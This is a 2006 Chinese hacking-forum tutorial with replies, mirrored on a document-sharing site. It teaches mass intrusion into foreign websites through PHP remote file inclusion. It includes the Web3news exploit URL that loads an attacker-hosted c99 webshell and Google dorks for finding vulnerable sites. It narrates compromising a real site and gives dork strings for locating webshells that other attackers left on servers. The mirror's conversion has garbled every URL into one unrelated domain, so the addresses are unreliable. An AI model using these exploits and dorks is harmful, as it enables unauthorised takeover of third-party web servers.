搜档网
当前位置:搜档网 › 国外WEB漏洞的利用到社会工程学批量拿Webshell

国外WEB漏洞的利用到社会工程学批量拿Webshell

[原创]国外WEB漏洞的利用到社会工程学批量拿Webshell
文章标题:[原创]国外WEB漏洞的利用到社会工程学批量拿Webshell顶部 独孤依人 发布于:2006-10-2107:18 [楼主][原创]国外WEB漏洞的利用到社会工程学批量拿Webshell
信息来源:邪恶八进制信息安全团队(https://www.sodocs.net/doc/b216744400.html,)
文章属性:漏洞利用
原文作者:独孤依人[SST]
发布时间:2006-09-08
关键字:包含漏洞 社会工程学 Google hack

注:首发于脚本安全小组(https://www.sodocs.net/doc/b216744400.html,/)内部交流版块,现友情提交到邪八论坛。写得很随意,旨在给新手朋友对国外WEB漏洞的利用做个引导,学会举一反三,思路扩展。文章虽然简单,转载还望注明出处。

我们先来看看远程文件包含漏洞的原理:

假设https://www.sodocs.net/doc/b216744400.html,/主页文件index.php的代码如下:
include($page);
?>
由于$page变量缺少充分过滤,没有判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,让以web权限执行我们的远程文件.
 
这样我们可以提交:
https://www.sodocs.net/doc/b216744400.html,/index.php?page=http://远程服务器/文件名称
我们只要把远程文件设为我们的PHP木马,这样就可以得到一个Webshell。

看完了漏洞的原理,我们来看看相关漏洞的介绍:
进入https://www.sodocs.net/doc/b216744400.html,/forum/thread.php?fid=20会看到很RemoteIncludeVulnerability的漏洞公告,随便点击个https://www.sodocs.net/doc/b216744400.html,/forum/read.php?tid=22看到如下漏洞简介:
Web3news<=0.95(PHPSECURITYADMIN_PATH)RemoteIncludeVuln

#=====================================================================
#Web3news<=v0.95(PHPSECURITYADMIN_PATH)RemoteFileInclusionExploit
#====================================================================
#
#CriticalLevel:Dangerous
#
#Venedorsite:https://www.sodocs.net/doc/b216744400.html,/web3news
#
#Version:AllVersions
#
#======================================================================
#Bugin:security/include/_class.security.php
#
#VluCode:
#--------------------------------
# # include$PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php";
#
#
#=======================================================================
#
#Exploit:
#--------------------------------
#
#https://www.sodocs.net/doc/b216744400.html,/[ScriptPath]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.sodocs.net/doc/b216744400.html,?
#
#Example:https://www.sodocs.net/doc/b216744400.html,/web3news/======>Vendorsite
#
#DOrk:allinurl:/web3news/
#======================================================================
#DiscoverdBy:SHiKaA
#
#Conatact:SHiKaA-[at]https://www.sodocs.net/doc/b216744400.html,
#
#GreetZ:Str0keKACPERRgodTimqXoRonMDXBl@Ck^B1rdANDALLccteam(coder-cruze-wolf)|cyper-worrior
===========================================================================

我们注重看这段代码:
#Exploit:
#----------------------

----------
#
#https://www.sodocs.net/doc/b216744400.html,/[ScriptPath]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.sodocs.net/doc/b216744400.html,?
#
#Example:https://www.sodocs.net/doc/b216744400.html,/web3news/======>Vendorsite
#
#DOrk:allinurl:/web3news/
简单说下意思:
Dork,我们常说的Google的关键字,也就是说我们只要在Google搜索allinurl:/web3news/,就可以得到些有漏洞的URL。
Example,他给举的一个例子,也就是说如果URL符合https://www.sodocs.net/doc/b216744400.html,/web3news/这个格式,我们就可以来利用它。
Exploit,溢出过的朋友可能就很清楚了,也就是我们常说的EXP,在这里的意思是把https://www.sodocs.net/doc/b216744400.html,/[ScriptPath]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.sodocs.net/doc/b216744400.html,?中的https://www.sodocs.net/doc/b216744400.html,/[ScriptPath]/换成https://www.sodocs.net/doc/b216744400.html,/web3news/(我们找到有漏洞的URL)即可得到一个Webshell,当然得先准备一个SHell放到远程机器上,我已经准备好了一个C99修改版的PHPSHell,连接:https://www.sodocs.net/doc/b216744400.html,/99.txt

好了,大概明白了利用的过程,我们现在就去入侵吧。
首先进Google搜索关键字:allinurl:/web3news/,会看到很多连接,很多都被人利用了,好不容易找了一个https://www.sodocs.net/doc/b216744400.html,/web3news/来做演示,我们直接在他的URL后面加上EXP代码得到https://www.sodocs.net/doc/b216744400.html,/web3news/security/include/_class.security.php?PHPSECURITYADMIN_PATH=https://www.sodocs.net/doc/b216744400.html,/99.txt?,然后提交就得到一个Webshll如图(1):
https://www.sodocs.net/doc/b216744400.html,/99.txt是我们事先上传好的PHPshell。文件包含漏洞大概利用过程就这样了,这个web3news漏洞现在被得利用得差不多了,大家可以测试下其它的相关漏洞,我测试了几个最新都成功了。

在上面我们利用的C99的PHPshell,这是一种免登录的PHPSHELL,在搜索的时候,我发现很多都被老外利用了,这个马在国外也比较流行,所以我当时就想通过搜索C99的PHPshell的关键字或许可以得到些Shell,于是总结了下关键字,在Google搜索:
"php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"

很多都失效了,但还是找到了一个如图(2):
点击进去,果然是一个C99的PHPShell,如图(3):
结果不是很理想,但至少证明这种方法是可以得到Webshell的,可能是我的关键字总结得不好,于是又观察了下C99的Shell,
看到很多C99的SHell标题后有-phpshell,好了,这样我们可以构造“intitle:.com-phpshell”关键字,我们去Google搜索下,果然不出所料,第一页就弄了好几个,当然我们还可以把com改成net,org,cn,jp,at等。

既然C99的PHPshell可以用Google去搜索,那其它的SHell呢?当然是可以了,于是我又想到了去搜索些国外比较流行的PHPSHell,我就拿R57shell为例,直接在Google搜索关键字:intitle:r57shell+uname,剩下的大家都知道,我也不说了。

没有什么

技术可言,重要的是思路,希望大家学会举一反三,有时会得到意想不到的结果。

图1
=800)window.open('https://www.sodocs.net/doc/b216744400.html,/attachment/Mon_0610/10_45620_252350e83361989.jpg');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">

图2
=800)window.open('https://www.sodocs.net/doc/b216744400.html,/attachment/Mon_0610/10_45620_d1*******d084e9.jpg');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">

图3
=800)window.open('https://www.sodocs.net/doc/b216744400.html,/attachment/Mon_0610/10_45620_495809ebdd8bc1c.jpg');"onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';">顶部 cc520 发布于:2006-10-2109:30 [1楼]
Linux权限设置都很好的,所以遇到BT的,也只能作列目录和读文件源代码用!顶部 h4k_b4n[BCT] 发布于:2006-10-2110:35 [2楼]

Quote:
这里是引用第[2楼]的l0pht于2006-10-2109:53发表的:
记得4-5年前lion就写过一篇这样的文章。所以4-5年后的今天也不能把这个当作什么原创的思路了。
那样子从本质上来说!现在很多技术都是基于以前很久的东西了!难道又不说原创啊!?那样子活着又有什么意思了?很多东西都是在基础上进行变化的!

如果你说lion那篇东西是原创的话,我可以告诉你,他也算是抄袭别人的手法了!因为这是属于GoogleHacking,难道GH也是lion他发现的啊?要不然就是你发现的咯!这类型利用Google找漏洞的技术文章早就在是从2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家(johnnyLong和PatrickChambet)分别作了名为Youfoundthatongoogle?和googleattacks的主题演讲。介绍如何利用Google和其他类似的搜索引擎进行信息的收集以及利用搜索回来的程序漏洞进行入侵。而GoogleHacking的前身就是GoogleWharking游戏演变而来的技术!

那么你觉得你说的这句话在本质和实际上有什么意义了?别人发布了文章不是抄袭、不是篡改的就是原创了!请你尊重LZ的辛苦!虽然我看这文章不用5分钟。不针对人!只针对你那句话顶部 独孤依人 发布于:2006-10-2111:02 [3楼]
四五年前我还刚接触网络,根本不懂网络,也不知道Lion,所以更谈不上看过所谓的他写的东西,如果朋友收藏这篇文章还望分享下,远程包含漏洞虽然是老了,但最近接二连三的发现,所以写点自己利用的方法,希望能给一些入门的朋友点帮助,GoogelHacking大家都知道,只是一种思路而以。文章已有一个多月,臭巴子叫我去投稿,我想稍做修改,应该是没有问题的,虽然我不算富有,但也不缺那个钱,技术的东西应该是免费共享的,所以发在邪八供需要的朋友看了。
非常佩服h4k_b4n的记忆力,建议做个历史学家不错,开玩笑了。
Over.顶部 cnhcerkf 发布于:2006-10-2

112:53 [4楼]
前几天玩了下,google
ext:txt"inurl:c99"
ext:phpintitle:"c99shell"


ext:txt+"r57shell""php"
ext:phpintitle:"r57shell"

原本曾经用这个收集过国内人的脚本马,不够后来专改名字得多了,不好用了而已。

现在google新出了codesearch脚本搜索,也很好玩捏。看看慕容小雨的BLOG有说。
https://www.sodocs.net/doc/b216744400.html,/codesearch
是google的脚本搜索地址。各位大锅想必已经玩过了。
只是技术,别斗嘴。嘿嘿。顶部 bluetooth 发布于:2006-10-2115:59 [5楼]
嗯,对我还是有用处的,呵呵。p.s原始的c99里面是有恶意代码在里面的顶部 l0pht 发布于:2006-10-2116:43 [6楼]
首先个人认为,GoogelHacking是总结性的技术,是把大量此类的技巧归类总结并加以自己想法与技巧形成的一门技术,而不是某个零散的想法或技巧。
其次我对原创的理解是这样的:原创并非不能借鉴别人的东西,原创不原创主要是看有没有在原有基础之上加入自己的原创想法。而楼主这种文章就很明显没有加入自己原创的想法,整套东西完全是以前现成的文章里有的。我对楼主没有任何的责备的意思,只是我看到与我理解不同的东西那我会说出我的观点。希望我这种比较直白的表达不要引起别人的误会。


[此贴被l0pht在2006-10-2116:53重新编辑]顶部 cntink 发布于:2006-10-2201:37 [7楼]
一年前,根据一群里的方法inurl:c99.txt拿到了很多国外网站的SHELL。。。
那是故意没有开启C99密码认证功能留下的“后门”,因为开启密码认证了,远程调用时不太方便,密码认证后有时候会跳转到网站其他目录或者页面去。因为“惯性”,所以貌似很多人也不知道C99有个密码认证功能吧?!顶部 vera 发布于:2006-10-2318:25 [8楼]

Quote:
这里是引用第[6楼]的cnhcerkf于2006-10-2112:53发表的:
前几天玩了下,google
ext:txt"inurl:c99"
ext:phpintitle:"c99shell"


.......
这位大哥的做法不错但是现在的google好像把这样的方式给封了!前几天我在动画吧!看到一编这样的文章好像都是过时的!文章了!可以操作的不是很好·(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:https://www.sodocs.net/doc/b216744400.html,/


相关主题